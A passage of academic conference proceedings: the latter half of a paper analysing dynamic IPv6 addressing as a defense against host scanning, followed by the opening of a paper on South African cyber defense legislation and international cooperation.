dynamic addressing technique must minimize overhead to be feasible for implementation. We analyze<br />
the factors that contribute to creating an effective dynamic addressing technique with the goal of<br />
determining the most efficient approach.<br />
4. Analysis of dynamic address factors<br />
There are three factors that contribute to an attacker’s ability to detect a target host on a subnet. The<br />
first factor is the number of dynamic bits in the address, which affects the size of the subnet. In a<br />
small address space, it is trivial for an attacker to check each address. The second factor is how often<br />
a target host’s address changes. If the address remains static, an attacker has as much time as<br />
necessary to locate the host. The third factor is the density of the address space, or the number of<br />
other hosts on an IP subnet. If an attacker does not know the target host’s address on a subnet,<br />
multiple other addresses will make identifying the target more difficult.<br />
For the purpose of our analysis, we investigate an attacker actively scanning an IP subnet with<br />
unicast addresses to identify a single targeted host. There are other methods an attacker can use to<br />
detect target hosts on a network. One such technique is a broadcast ping, allowed by IPv4. Many<br />
gateway devices block broadcast pings. Another method is to passively scan a subnet with a packet<br />
sniffer. This method has scope limitations as the attacker must have a presence on the same subnet<br />
as the target host. A unicast scan is more likely since there are multiple methods of scans that avoid<br />
common security measures implemented on networks.<br />
4.1 Size of address<br />
The larger the address space, the more time it takes an attacker, on average, to locate the target<br />
address on an IP subnet. Table 1 illustrates this by comparing subnets of various sizes. In the table,<br />
we use the three most common Internet Protocol version 4 (IPv4) classful address blocks as<br />
examples. We also compare the typical subnet size used in IPv6. Scanning an entire class C address<br />
space is trivial and can be accomplished in less than a minute while scanning an entire IPv6 subnet is<br />
currently infeasible.<br />
Table 1: Comparison of addresses of various sizes, the scan time is based on a sequential scan with<br />
a 150 millisecond average round trip time for a single packet (GLORIAD 2010)<br />
Address Type Address Size (bits) Address Size (hosts) Scan Time<br />
IPv4 Class C Subnet 8 256 38 sec<br />
IPv4 Class B Subnet 16 65,536 3 hrs<br />
IPv4 Class A Subnet 24 16,777,200 29 days<br />
IPv6 Subnet 64 1.845·10 19<br />
8.77·10 10 yrs<br />
So far we have mentioned the time it takes an attacker to scan the various address types in Table 1,<br />
however, this is the time it takes an attacker to scan the entire address space. The expected amount<br />
of time to locate a host is much less due to a paradox known as the birthday attack (Schneier 1996).<br />
According to the birthday attack, an attacker can expect to locate a target host in attempts where<br />
m is the number of bits in the address. What this means is that an attacker can expect to locate a host<br />
on a class C subnet in 2.4 seconds, a class B subnet in 38 seconds, and a class A subnet in 10<br />
minutes. A host on an IPv6 subnet can still expect to escape detection for over 73,500 years. No IPv4<br />
host that is not defending against active scanning can have any expectation of remaining hidden for a<br />
reasonable amount of time.<br />
4.2 Frequency of address change<br />
The more frequently an address changes, the more difficult it is, on average, for an attacker to<br />
successfully locate and target a specific address. This is particularly true if the address changes more<br />
rapidly than an attacker can scan the subnet. As mentioned in Section 4.1, a larger address space<br />
takes longer to scan. It follows that addresses on a larger subnet need to change less frequently. To<br />
understand the relationship between changing and non-changing addresses, we analyze the number<br />
of attempts it takes an attacker to locate a static address on a subnet. Since the address is static, the<br />
probability of an attacker guessing the address increases with each subsequent guess. This<br />
86
Stephen Groat et al.<br />
probability follows a hypergeometric distribution. In the case of locating specific hosts on a subnet, the<br />
probability can be written as:<br />
where N represents the total possible addresses in the subnet, h represents the target host(s), and r<br />
represents the number of guesses an attacker takes in an attempt to find the target address(es).<br />
The best case for the target host is if its address changes at the same rate that an attacker scans a<br />
single address. To provide the fairest assessment, we assume a scenario where the attacker is aware<br />
of the target host changing his/her address. As a result, the attacker randomizes his/her address<br />
guesses, allowing for repetition of addresses. This is in contrarst to the normal approach where an<br />
attacker exhaustively scans a subnet without repetition. The probability of detecting the target host<br />
using an exhaustive search is slightly lower due to the possibility of a host address changing to a<br />
previously guessed address. In the attacker-aware scenario, the probability of detecting the target<br />
host remains the same with each subsequent guess and follows a cumulative binomial distribution as<br />
shown in Equation 2<br />
where N again represents the total possible addresses in the subnet and r represents the attempt<br />
during which detections occurs. Figure 1 depicts the difference between the probabilities of a static<br />
address versus a changing address that follows a binomial distribution. A subnet of size 256 hosts is<br />
used as an example for this figure.<br />
Figure 1: The probability an attacker has of detecting a target address within r attempts, the solid line<br />
represents the probability given a static address while the dotted line represents the<br />
probability if the address is changed at the same rate it is scanned<br />
87<br />
(1)<br />
(2)
Stephen Groat et al.<br />
It is unlikely, however, that a target address will change at the same rate an attacker scans a subnet.<br />
A target host can decrease the probability of detection compared to a static address by changing its<br />
address more frequently than the time it takes an attacker to scan the entire subnet. In this scenario,<br />
we assume the attacker knows the frequency of the address changes. We make this assumption to<br />
provide the attacker with the highest probability of target detection, and thus demonstrate the worstcase<br />
scenario for the target host. In this scenario, the probability of detecting a target address follows<br />
Equation 1 until the address changes. After the address changes, Equation 1 resets to r=1. If we<br />
classify each address change as a round, the probability of detection on round z can be written as:<br />
Figure 2 also utilizes a subnet of 256 addresses. The plot illustrates the difference between a static<br />
address and addresses that changes after an attacker scans r addresses. The address that changes<br />
every round (r=1) follows a binomial distribution. The figure demonstrates that as the frequency of<br />
change approaches the time it takes an attacker to scan a single address, Equation 3 converges to<br />
Equation 2. Alternatively, as the attacker is able to scan more of the address space between address<br />
changes, Equation 3 converges to Equation 1.<br />
Figure 2: The probability an attacker has of detecting a static target address within 256 attempts<br />
versus the probability of detecting an address that changes after an attacker scans r<br />
addresses over z rounds<br />
4.3 Density of address space<br />
The more sparsely populated the address space is, the more difficult it is for an attacker to pinpoint<br />
the target host. The reason for this is that the attacker does not know the address of the target host. If<br />
the attacker knew the address, he/she would not need to scan the subnet. Assuming the attacker has<br />
no additional information pertaining to the identity of a host (e.g., operating system), a successful<br />
scan reply provides no indication of success.<br />
The probability of detecting a host increases with the number of hosts on a subnet. The probability of<br />
detecting a host can be calculated using Equation 1. In Section 4.2, h=1 to represent a single target<br />
88<br />
(3)
Stephen Groat et al.<br />
host. In this case, h is equal to the number of total hosts on the subnet. As already mentioned,<br />
successful detection does not indicate that the host detected is the target host.<br />
This factor degrades an attacker’s capability of detecting a target host. In the single host scenario<br />
discussed in Section 4.2, locating a target takes time. Once the target is located, though, the attacker<br />
knows he/she has identified the target host because there are no other hosts on the subnet. With<br />
multiple hosts on the subnet, an attacker will get false positives. By false positive, we mean indication<br />
of success is received by the attacker when the located host is not the target. The false positive rate<br />
increases with the number of non-target hosts on the subnet. Unlike a password attack where<br />
success provides an attacker access to a machine, a successful scan reply tells the attacker little<br />
about whether the discovered host is the target host. Even in the case of multiple discovered hosts,<br />
the attacker does not know which host is the target. Of course, with additional information, such as<br />
operating system or protocol, the attacker can filter out hosts not matching a certain profile.<br />
5. Interaction of dynamic address factors<br />
The three factors described in Section 4 are not independent. As certain factors increase, other<br />
factors can decrease while still maintaining the same overall probability of detection. For example,<br />
there is a relationship between address size and frequency of address change. There is also a<br />
relationship between subnet density and frequency of address change.<br />
Increasing the size of the address allows for the frequency of the address change to decrease without<br />
degrading security. As the size of the address increases linearly, the size of the address space<br />
increases exponentially. The increased address space requires more time and resources from an<br />
attacker to exhaustively scan. Beyond a certain address size, an attacker cannot exhaustedly scan<br />
the exponentially growing network quickly. Therefore, it is possible for the host to decrease the<br />
frequency of the address change without increasing the probability it will be detected. Since each<br />
address change requires computation on the part of the host, decreasing the frequency of address<br />
change is desirable. A larger address space can result in less computational requirements with the<br />
same probability of detection as that of a smaller address space with more frequent address changes.<br />
Density of address space also affects frequency of address change. As the density of the address<br />
space increases, the probability of correlating an address with a specific host decreases. The<br />
increased density occurs because more hosts populate the subnet. As mentioned in Section 4.3, a<br />
dense subnet results in a higher probability of an attacker detecting a host that is a false positive.<br />
Therefore, a targeted host can use the dense network to lower the probability of being detected.<br />
Density in the address space also has an inverse correlation to the possibility of address collisions. By<br />
address collision, we mean that a host changes its address to a pre-existing address on the subnet.<br />
Since each host must have a globally unique address to ensure connectivity, address collisions must<br />
be avoided on the subnet. Repeated address collisions could prevent a host from sending or receiving<br />
network traffic, thus decreasing throughput and Quality of Service (QoS). While increased density in<br />
the address space provides a host with a lower probability of detection, address space density must<br />
be balanced with the probability of address collisions to ensure network connectivity.<br />
Address size inversely correlates with the probability of address collisions. It is desirable to have a<br />
subnet populated by multiple hosts to increase the probability of an attacker finding a false positive.<br />
By increasing the address size, the address space increases. A larger address space allows for more<br />
hosts on the subnet without overpopulating the subnet. This means that a larger subnet can be less<br />
densely populated. The result is that a detected host still has the same probability of being a false<br />
positive while a host changing its address has a lower probability of an address collision.<br />
6. Simulation results<br />
To validate our analysis of changing addresses in Section 4.2, we simulated four different rates for<br />
addresses to change. The rates simulated were a static address (never changes) and addresses that<br />
changed after an attacker scanned 64 addresses (r=64), eight addresses (r=8), and one address<br />
(r=1). The simulation results are listed in Table 2. The table highlights four search intervals. The four<br />
intervals are 64, 128, 192, and 256 guesses. For each interval, a simulated attacker attempted to<br />
locate a target host with an 8-bit host address within the specified interval. Each interval was<br />
simulated for 100,000 iterations. The probability displayed is the average over the 100,000 iterations.<br />
The probabilities produced, match the calculated probabilities at each interval depicted in Figure 2.<br />
89
Stephen Groat et al.<br />
Table 2: Probability conducted in simulation of detecting a target host with an 8-bit address within 64,<br />
128, 192, and 256 guesses, each listed probability is the average over 100,000 iterations<br />
Probability of detection within:<br />
64 guesses 128 guesses 192 guesses 256 guesses<br />
Static Address 0.249 0.503 0.748 1<br />
0.248 0.435 0.578 0.682<br />
Changing Address (r64)<br />
Changing Address (r8)<br />
Changing Address (r1)<br />
7. Security through dynamic addressing<br />
0.225 0.398 0.533 0.637<br />
0.222 0.393 0.528 0.632<br />
Establishing a moving target defense is an effective way of protecting users’ privacy and data.<br />
Changing hosts’ addresses, referred to as dynamic addressing, enhances security. If target<br />
addresses continually change, an attacker loses the expectation of narrowing the search space with<br />
successive guesses. If the attacker is able to locate a targeted host, a dynamically changing host<br />
address limits the time an attacker has access to the host. Since the discovered address changes, the<br />
attacker no longer knows the host’s location on the network. Additionally, the nature of dynamic<br />
addressing prevents other types of targeted attacks, which rely on static addressing.<br />
Changing the addresses of hosts allows them to logically move within the address space or subnet.<br />
As illustrated in Figure 2, the more often an address changes, the more difficult it is to locate and<br />
target the host. A changing address, combined with other factors such as address size and subnet<br />
density, creates a moving target defense. A large address space supporting many hosts is sparsely<br />
populated making it difficult for an attacker to pinpoint a specific target host. Other network hosts<br />
result in false positives for an attacker while unoccupied address spaces reduces the possibility of<br />
address collisions. The incorporation of dynamic addressing considerably reduces the probability of<br />
detecting a target host while still maintaining connectivity.<br />
Dynamic addressing also protects against certain classes of network attacks. For example, an<br />
attacker attempting a targeted DoS attack first has to find the target host on the subnet. Even if the<br />
attacker finds the host, the attack is limited by the interval between address changes. Other targeted<br />
network attacks, such as session hijacking and man-in-the-middle, are constrained by the same<br />
limitations as DoS attacks. To attack dynamically addressed hosts, an attacker must be able to either<br />
quickly find the host after an address change or predict the address change. If a sufficiently<br />
randomized dynamic address obscuration algorithm is utilized, targeting hosts in a large address<br />
space should not be possible.<br />
Providing security at the network layer also provides transitive security against attacks and exploits at<br />
layers above the network layer since many other attacks rely on network transmissions. The majority<br />
of application layer security flaws are exploited by either taking control of a system or transferring<br />
sensitive information back to an attacker. By securing the network layer, even if an attacker is able to<br />
identify a valid vector of attack on an application, the window for attack is limited by the frequency of<br />
the address change. Once the address changes, the attacker loses any existing vector to control the<br />
remote host. The attacker must then locate the host to reestablish the connection.<br />
8. Future work<br />
The next phase of our research works to develop a sufficiently randomized algorithm for dynamically<br />
obscuring IP addresses. Our goal is to produce an approach that dynamically changes IP addresses<br />
multiple times within a single session. By changing addresses multiple times within a single session,<br />
an attacker will have more difficulty locating target hosts. Even if an attacker locates the host,<br />
90
Stephen Groat et al.<br />
changing addresses multiple times within a session prevents the attacker from capturing enough<br />
network traffic to correlate the nature of a communication between two hosts.<br />
Our particular approach leverages IPv6. As eluded to in Section 4.1, current methods for locating a<br />
target address in an IPv6 subnet are infeasible in a reasonable amount of time. The immense IPv6<br />
address space will also likely be sparsely populated. As discussed in Section 4.3, locating any host in<br />
a sparsely populated address space is probabilistically difficult. In addition to the difficulty of locating<br />
hosts in a sparsely populated subnet, hosts using a dynamic addressing scheme can reasonably<br />
expect not to collide with occupied addresses when rotating their addresses. In order to achieve a<br />
reasonable dynamic addressing algorithm in IPv4, hosts would have to draw from a pool of unused<br />
addresses. Reserving pools of addresses are more difficult with the depletion of the IPv4 address<br />
space (NRO 2010). Additionally, an IPv4 pool of addresses, regardless of how large, would be almost<br />
trivial for an attacker to scan. To achieve a sufficiently randomized dynamic addressing algorithm, we<br />
plan to repeatedly use a cryptographic hash function to obscure the 64-bit interface identifier that<br />
makes up the subnet portion of an IPv6 address. By using a cryptographic hash function, malicious<br />
hosts cannot feasibly predict the dynamic address (Schneier 1996). Since hosts in IPv6 can generate<br />
and advertise their own addresses (Thomson, Narten & Jinmei 2007), obscuration is kept local.<br />
Localizing obscuration reduces the possibility of a malicious host performing any type of address<br />
hijacking or man-in-the-middle attack. It also reduced the computational overhead that address<br />
generation servers would incur.<br />
9. Conclusion<br />
As users exchange more personally identifiable information over the Internet, it is increasingly<br />
important to protect users’ security and privacy. One of the best ways to accomplish this is through<br />
the use of a moving target defense. At the network layer, this can be achieved by dynamically<br />
changing host IP addresses. Frequently changing addresses are probabilistically more difficult to<br />
detect than static addresses. Dynamic addresses also provide an additional layer of security for hosts<br />
that are detected by an attacker. An attacker is unable to compromise hosts for a significant period of<br />
time since the hosts’ network address changes. Dynamically changing addresses provide security and<br />
privacy by creating a moving target solution implementable as low as the network layer of the protocol<br />
stack.<br />
References<br />
Bagnulo, M., & Arkko, J. October 2006. Cryptographically Generated Addresses (CGA) Extension Field Format.<br />
RFC 4581 (Proposed Standard).<br />
Dunlop, M., Groat, S., Marchany, R., & Tront, J., 23-28 January 2011. ‘IPv6: Now You See Me, Now You Don't’,<br />
Proceedings of the Tenth International <strong>Conference</strong> on Networks (ICN 2011), St. Maarten, The Netherlands<br />
Antilles.<br />
Fink, R. A., Brannigan, M. A., Evans, S. A., Almeida, A. M., & Ferguson, S. A. 9 May 2006. Method and<br />
Apparatus for Providing Adaptive Self-Synchronized Dynamic Address Translation, United States Patent<br />
No. US 7,043,633 B1.<br />
GLORIAD. 2010. GLORIAD Average Round Trip Time - Last Week. [Online] Available<br />
http://www.gloriad.org/gloriad/monitor/stats/avg_round_trip_time.week.html. [11 October, 2010].<br />
Johnson, P. C., Kapadia, A., Tsang, P. P., & Smith, S. W. 2007. ‘Nymble: Anonymous IP-Address Blocking’,<br />
Privacy Enhancing Technologies Symposium (PET '07), Ottawa, Canada, pp.113-133.<br />
Koukis, D., Antonatos, S., & Anagnostakis, K. 2006. On the Privacy Risks of Publishing Anonymized IP Network<br />
Traces. Communications and Multimedia Security, 4237: 22-32.<br />
Narten T., Draves, R., & Krishnan, S. September 2007. Privacy Extensions for Stateless Address<br />
Autoconfiguration in IPv6. RFC 4941 (Draft Standard).<br />
NRO. 2010. Remaining IPv4 address space drops below 5%. [Online] Available http://www.nro.net/<br />
media/remaining-ipv4-address-below-5.html, [7 November, 2010].<br />
Reiter, M., & Rubin, A. ‘Anonymous Web Transactions with Crowds’, Communications of the ACM, vol. 42, no. 2,<br />
pp. 32-48.<br />
Schneier, B. 1996. Applied Cryptography: Protocols, Algorithms, and Source Code in C. (2 nd Edition. New York:<br />
Wiley.<br />
Sheymov, V. I. 18 February, 2010. Method and Communications and Communication Network Intrusion<br />
Protection Methods and Intrusion Attempt Detection System, United States Patent No. US 2010/0042513<br />
A1.<br />
Shields, C., & Levine, B. N. 2000. ‘A protocol for anonymous communication over the Internet’, Proceedings of<br />
the 7th ACM conference on Computer and communications security, Athens, Greece, pp. 33-42.<br />
Thomson, S., Narten T., & Jinmei, T. September 2007. IPv6 Stateless Address Autoconfiguration. RFC 4862<br />
(Draft Standard).<br />
91
Changing the Face of Cyber Warfare with International<br />
Cyber Defense Collaboration<br />
Marthie Grobler 1 , Joey Jansen van Vuuren 1 and Jannie Zaaiman 2<br />
1<br />
Council for Scientific and Industrial Research, Pretoria, South Africa<br />
2<br />
University of Venda, South Africa<br />
mgrobler1@csir.co.za<br />
jjvvuuren@csir.co.za<br />
jannie.zaaiman@univen.ac.za<br />
Abstract: The international scope of the internet and global reach of technological usage requires the South<br />
African legislative system to address issues related to the application and implementation of international<br />
legislation. However, legislation in cyberspace is rather complex since the technological revolution and dynamic<br />
technological innovations are often not well suited to any legal system. A further complication is the lack of<br />
comprehensive international cyber defense cooperation treaties. The result is that many countries are not<br />
properly prepared, nor adequately protected by legislation, in the event of a cyber attack on a national level. This<br />
article will address the international cyber defense collaboration problem by looking at the impact of technological<br />
revolution on warfare. Thereafter, the article will evaluate the South African legal system with regard to<br />
international cyber defense collaboration. It will also look at the influence of cyber defense on the international<br />
position of the Government, as well as cyber security and cyber warfare acts and the command and control<br />
aspects thereof. The research presented is largely theoretical in nature, focusing on recent events in the public<br />
international domain.<br />
Keywords: collaboration, cyber defense, legislation, government responsibility<br />
1. Introduction<br />
The international scope of the internet and global reach of technological usage requires the South<br />
African legislative system to address issues related to the application and implementation of<br />
international legislation. However, the complexities of cyberspace and the dynamic nature of<br />
technology innovations requires a cyber defense framework that is not well suited to any current legal<br />
system. A further complication is the lack of comprehensive international cyber defense cooperation<br />
treaties, resulting in many countries not being properly prepared, or adequately protected by<br />
legislation, in the event of a cyber attack on a national level.<br />
For the purpose of this article, cyber warfare is defined as the use of exploits in cyber space as a way<br />
to intentionally cause harm to people, assets or economies (Owen 2008). It can further be defined as<br />
the use and management of information in pursuit of a competitive advantage over an opponent,<br />
involving "the collection of tactical information, assurance that one’s own information is valid,<br />
spreading of propaganda or disinformation among the enemy, undermining the quality of opposing<br />
force information and denial of service or of information collection opportunities to opposing forces"<br />
(Williams & Arreymbi 2007).<br />
The article will address some of the aspects related to changing the face of cyber warfare, focusing<br />
specifically on international cyber defense collaboration. It will look at some international technological<br />
revolutions that had an impact on the international legal scope and briefly evaluate the South African<br />
legal system with regard to international cyber defense collaboration. The article will also address<br />
international cyber warfare and the influence of cyber defense on the international position of the<br />
Government. The article will conclude with recommendations on working towards international cyber<br />
defense collaboration.<br />
2. Technological revolutions' impact on warfare<br />
Modern society created both a direct and indirect dependence on information technology, with a<br />
strong reliance on immediacy, access and connections (Williams & Arreymbi 2007). As a result, a<br />
compromise of the confidentiality, availability or integrity of the technological systems could have<br />
dramatic consequences regardless of whether it is the temporary interruption of connectivity, or a<br />
longer-term disruption caused by a cyber attack (Warren 2008).<br />
Battlespace, as implied by military use and warfare, is becoming increasingly difficult to define since<br />
advances in technology revolutionized the act of war. "Today, cyber attacks can target political<br />
92
Marthie Grobler et al.<br />
leadership, military systems, and average citizens anywhere in the world, during peacetime or war,<br />
with the added benefit of attacker anonymity. The nature of a national security threat has not<br />
changed, but the Internet has provided a new delivery mechanism that can increase the speed,<br />
diffusion, and power of an attack." (Geers ND). Although the physical destruction of the internet<br />
infrastructure as a result of cyber warfare is unlikely, a number of technological exploits can be<br />
employed as part of a cyber warfare attack aimed at financial loss. These exploits include:<br />
Probes - an attempt to gain access to a system;<br />
Scans - many probes done using an automated tool;<br />
Account compromise - hacking, or the unauthorized use of a computer account;<br />
Root compromise - compromise of an account with system administration privileges;<br />
Packet sniffing - capturing data from information as it travels over a network;<br />
Denial of service (DoS) attacks - deliberate consuming of system resources to deny; and<br />
Malicious programs and malware - hidden programs that causes unexpected, undesired results<br />
on a system (Owen 2008).<br />
Technological revolutions in computers and electronics make major advances in weapons and<br />
warfare possible. It also extends to areas such as information processing and networks,<br />
communications, robotics and advanced munitions (O'Hanlon 2000). Technological revolutions enable<br />
countries to prepare offensive and defensive strategies in cyber space.<br />
3. Evaluating the South African legal system with regard to international cyber<br />
defense collaboration<br />
From recent activity, it is clear that both the South African Government, the defense environment and<br />
the business environment are becoming increasingly aware of the threats and implications enabled by<br />
the use of the cyber environment. It is also clear that the threats are becoming more sophisticated<br />
and advanced when used as an element of cyber warfare and cyber crime.<br />
The internet is increasingly becoming more volatile and insecure. In fact, cyber terrorists have the<br />
capability to shut down South Africa’s power, disrupt financial transactions, and commit crimes to<br />
finance their physical operations. Organized crime is also increasingly making use of the internet as a<br />
means of communication and financial gain. Therefore, South Africa needs a national cyber defense<br />
system to which everybody must obey.<br />
3.1 The South African legal system<br />
Over the past decade, South Africa has taken the first steps to protect its information. It has passed<br />
legislation starting with the South African Constitution of 1996, which protects privacy, and the ECT<br />
(Electronic Communications and Transactions) Act of 2002, which provides for the facilitation and<br />
regulation of electronic communications and transactions (ECT 2002).<br />
In 2000, the PAIA (Promotion of Access to Information Act) No 2 as amended, was passed to give<br />
effect to Section 32 of the Constitution, subject to justifiable limitations (PAIA Act 2000). These<br />
limitations are aimed at the reasonable protection of privacy, commercial confidentiality and good<br />
governance in a manner that balances the right of access to information with any other rights,<br />
including the rights in the Bill of Rights in Chapter 2 of the Constitution (SA Constitution 1996). Linked<br />
to this Act is the PAIA Reg 187 Regulations regarding the promotion of information of access to<br />
information (Government Gazette 2003).<br />
In 2002, the RIC (Regulation of Interception of Communications and Provision of Communicationrelated<br />
information) Act was passed to regulate the interception of certain communications, the<br />
monitoring of certain signals and radio frequency spectrums and the provision of certain<br />
communication-related information. This Act also regulates the making of applications for, and the<br />
issuing of, directions authorizing the interception of communications and the provision of<br />
communication-related information under certain circumstances (RIC Act 2002).<br />
Towards the end of 2009, the South African Government passed two bills, namely the:<br />
93
Marthie Grobler et al.<br />
PPI (Protection of Personal Information) Bill that introduces brand new legislation to ensure that<br />
the personal information of individuals is protected, regardless of whether it is processed by public<br />
or private bodies (Giles 2010).<br />
Information Bill that is meant to replace an existing piece of legislation, the Protection of<br />
Information Act of 1982. It deals with the protection of State information and empowers the<br />
government to classify certain information in order to protect the national interest from suspected<br />
espionage and other hostile activities (Republic of South Africa 2010).<br />
Playing an important role in the South African legal system is international standards. ISO/IEC 27002<br />
is an information security standard published by the International Organization for Standardization<br />
(ISO) and the International Electrotechnical Commission (IEC), originally published as ISO/IEC<br />
17799:2005. It is entitled Information technology - Security techniques - Code of practice for<br />
information security management. This standard has been accepted by and adopted in South Africa<br />
(International Standards Organization 2008).<br />
South Africa has also adopted the Council of Europe Cyber Crime Treaty in Budapest in 2001 but has<br />
not ratified it yet. The treaty contains important provisions to assist law enforcement in their fight<br />
against transborder cyber crime. Therefore, it is imperative that South Africa ratifies the cyber crime<br />
treaty to avoid becoming an easy target for international cyber crime. The ratification will hopefully be<br />
done soon, although the South African government seems to be presently focused on basic service<br />
delivery and more traditional crimes given the current local crime situation. However, steps to<br />
establish the Computer Security Incident Response Team (CSIRT) indicate that the aim to tackle<br />
cybercrime is gathering momentum.<br />
3.2 The South African position on international cyber defense collaboration<br />
In February 2010, South Africa published a draft Cyber security policy that would set a framework for<br />
the creation of relevant structures, boost international cooperation, build national capacity and<br />
promote compliance with appropriate cyber crime standards. Over the last five years, South Africa<br />
focused on modernizing and expanding information technology equipment, applications, and<br />
centralized hosting capabilities and network infrastructure. This was done as part of its strategy to<br />
fully modernize and integrate the national criminal justice system to the maximum benefit of society<br />
and at minimum cost to crime prevention agencies. This policy has not been adopted, but provides a<br />
first step from South Africa towards international cyber defense collaboration.<br />
During a more recent attempt to international cyber defense collaboration, South Africa participated in<br />
the 12 th United Nations Congress on Crime Prevention and Criminal Justice in Salvador, Brazil during<br />
April 2010. During this congress, delegates considered the best possible responses to cyber crime as<br />
the Congress Committee took up the dark side of advances in Information Technology. While<br />
advances in information technology held many benefits for society, its dark underside (computerbased<br />
fraud and forgery, illegal interception of private communications, interference with data and<br />
misuse of electronic devices) requires States to develop an organized, international response.<br />
Speakers at the congress remained undecided about the nature of the required response, with<br />
supporters of the Council of Europe’s Budapest Convention on crime suggesting an expansion of the<br />
treaty, and others suggestion new multilateral negotiations (UN Information Officer 2010).<br />
In general, governments are having a tough time keeping pace, and their responses to cyber crime is<br />
sadly lacking. In many countries, cyber crime damage economies and State credibility and further<br />
impede national development. Cooperation in stamping cyber crime and protecting countries against<br />
cyber warfare is vital at all levels of defense, law enforcement, the judiciary and the private sector.<br />
According to Markoff (2010), a group of cyber security specialists and diplomats, representing 15<br />
countries (including South Africa) has agreed on a set of recommendations to the United Nations'<br />
Secretary General for negotiations on an international computer security treaty. In recent years, an<br />
explosion in cyber crime has been accompanied by an arms race in cyber weapons, as dozens of<br />
nations have begun to view computer networks as arenas for espionage and warfare. The<br />
recommendations to the United Nations from the specialists and diplomats reflect an effort to find<br />
ways to address the dangers of the anonymous nature of the Internet, as in the case of the object of a<br />
cyber attack misconstruing the identity of the attacker. Among the troubling issues is the existence of<br />
proxies. The report also suggests that “the same laws that apply to the use of kinetic weapons should<br />
94
Marthie Grobler et al.<br />
apply to state behavior in cyber space.” (Markoff 2010). The report recommends five steps to improve<br />
international cyber cooperation and security:<br />
Having more discussions about the ways different nations view and protect their computer<br />
networks, including the Internet;<br />
Discussing the use of computer and communications technologies during warfare;<br />
Sharing national approaches on legislation about computer security;<br />
Finding ways to improve the Internet capacity of less developed countries; and<br />
Negotiating to establish common terminology to improve the communications about computer<br />
networks (Markoff 2010).<br />
The signers of the report are major cyber powers and of other nations: the United States, Belarus,<br />
Brazil, Britain, China, Estonia, France, Germany, India, Israel, Italy, Qatar, Russia, South Africa and<br />
South Korea. From a legal perspective, a number of concerns can be identified, such as:<br />
Lack of collaboration between industry and the defense environment;<br />
Capacity of the legal fraternity to comprehend the complexity of the cyber environment and to<br />
deliver a verdict based on a thorough understanding of the facts;<br />
Collaboration between countries and the agreements on protocols;<br />
Lack of collaboration between State Departments on cyber warfare and cyber crime;<br />
Lack of collaboration between municipalities, districts, regions and provinces; and<br />
Lack of collaboration between urban and tribal authorities.<br />
Networked computers now control everything, including bank accounts, stock exchanges, power<br />
grids, the defence, the justice system and government. Networked computers also control all health<br />
records and crucial personal data. From a single computer an entire nation can be brought down. The<br />
authors are of the opinion that a series of regional conferences with all stakeholders involved and<br />
sponsored by private sector should be conducted. Significant progress has been made in South<br />
Africa, but commitments are required to draft a comprehensive Charter for South Africa and its unique<br />
situation.<br />
4. International cyber warfare<br />
The North Atlantic Treaty Organization (NATO) is only just beginning to recognize that the Internet<br />
has become a new battleground that also requires a military strategy. To counter such threats, a<br />
group of NATO members established a cyber defense centre in Tallinn. The 30 staffers at the<br />
Cooperative Cyber Defense Centre of Excellence analyze emerging viruses and other threats and<br />
pass on alerts to sponsoring NATO governments. Experts on military, technology, law and science<br />
are wrestling with such questions as: what qualifies as a cyber attack on a NATO member, and so<br />
triggers the obligation of alliance members to rush to its defense; how can the alliance defend itself in<br />
cyber space? Answers to these questions are strikingly different: Washington creates new funds for<br />
cyber defenses; Estonia is aiming to create a nation of citizens alert and wise to online threats (NATO<br />
ND).<br />
The choice of Estonia as the home to NATO’s new cyber war brain trust is not accidental. In 2007,<br />
Estonia suddenly found itself in the midst of cyber attacks. The fact that this happened in Estonia, a<br />
proud digital society, was eye opening. Back in 2007, Estonia’s minister of defense stated that the<br />
attacks cannot be treated as hooliganism, but as an attack against the State. Nevertheless, no troops<br />
crossed Estonia’s borders, and there was nothing that could be regarded as a conventional conflict.<br />
The United States clearly wants to take a military strategy approach. Estonia, on the other hand,<br />
prefers to demilitarize the issue by educating citizens on how to identify risks and promote a culture of<br />
cyber security, starting with schoolchildren. The Estonians have the right idea. A society of savvy<br />
citizens is the best defense (Geers ND).<br />
In response to the cyber attacks on Estonia in 2007 and Georgia, NATO set up a coordinated cyber<br />
defense policy with a quick-reaction cyber team on permanent standby. This, however, has not<br />
stopped the constant attack on NATO computers (Gardner 2009).<br />
95
Marthie Grobler et al.<br />
5. Influence of cyber defense on the international position of Governments<br />
The opinion of international Department of Defense (DOD) officials is that cyber space is a domain<br />
available for warfare, similar to air, space, land, and sea (Wilson 2007). As a result, any cyber attacks<br />
can have either a direct or an indirect influence on the DOD. Accordingly, the DOD needs to consider<br />
the potential effects of an emerging military-technological revolution that will have profound effects on<br />
the way wars are fought. Growing evidence exists that over the next several decades, the military<br />
systems and operations will be superseded by new, far more capable means and methods of warfare<br />
by new or greatly modified military organizations (Krepinevich 2003).<br />
The DOD views information itself as both a weapon and a target in warfare. In addition, it provides the<br />
ability to disseminate persuasive information rapidly in order to directly influence the decision making<br />
of diverse audiences. By incorporating the cyber domain in the cyber defense structure, a number of<br />
new aspects come into play that may have an influence on the manner in which the DOD reacts to<br />
cyber attacks:<br />
New national security policy issues;<br />
Consideration of psychological operations used to affect friendly nations or domestic audiences;<br />
and<br />
Possible accusations against the State of war crimes if offensive military computer operations or<br />
electronic warfare tools severely disrupt critical civilian computer systems, or the systems of noncombatant<br />
nations (Wilson 2007).<br />
An example of the last bullet point: if wrongful acts are committed inside a country, the State can be<br />
held responsible for these acts, since the State is obliged to fulfill the interest of the entire<br />
international community. If a representative of a State organ or a private person acting on the State's<br />
behalf committed an act, the act may be attributed to the State (Article 3 ILC Draft Articles). The<br />
physical location of a computer or hardware used in a cyber attack does not (and should not) allow for<br />
attributing that cyber attack to a particular State. Such an assumption would be greatly unjustified,<br />
since a State does not carry the responsibility for actions of its residents operating hardware located<br />
within its territory.<br />
The State, however, can be held responsible in the light of existing international law doctrine, for a<br />
breach of an international obligation. This obligation relates not to actions but to omissions, i.e. for not<br />
preventing that attack to take place. This interpretation is derived from the wording of Article 14(3) of<br />
the International Law Commission (ILC) Draft Articles, which provides that a State may be held<br />
responsible for the conduct of organs of an insurrectional movement, if such an attribution is<br />
legitimate under international law. The State has therefore an obligation to show best efforts, and to<br />
take all “reasonable and necessary” measures in order to prevent a given incident to happen. The<br />
occurrence of this obligation was best reflected in the International Court of Justice (ICJ) case<br />
concerning the United States diplomatic and consular staff in Teheran. In its decision, the ICJ found<br />
that the overriding of the United States embassy in Teheran does not free Iran from the responsibility<br />
for that incident, although it also cannot be attributed to Iran (Kulesza 2010).<br />
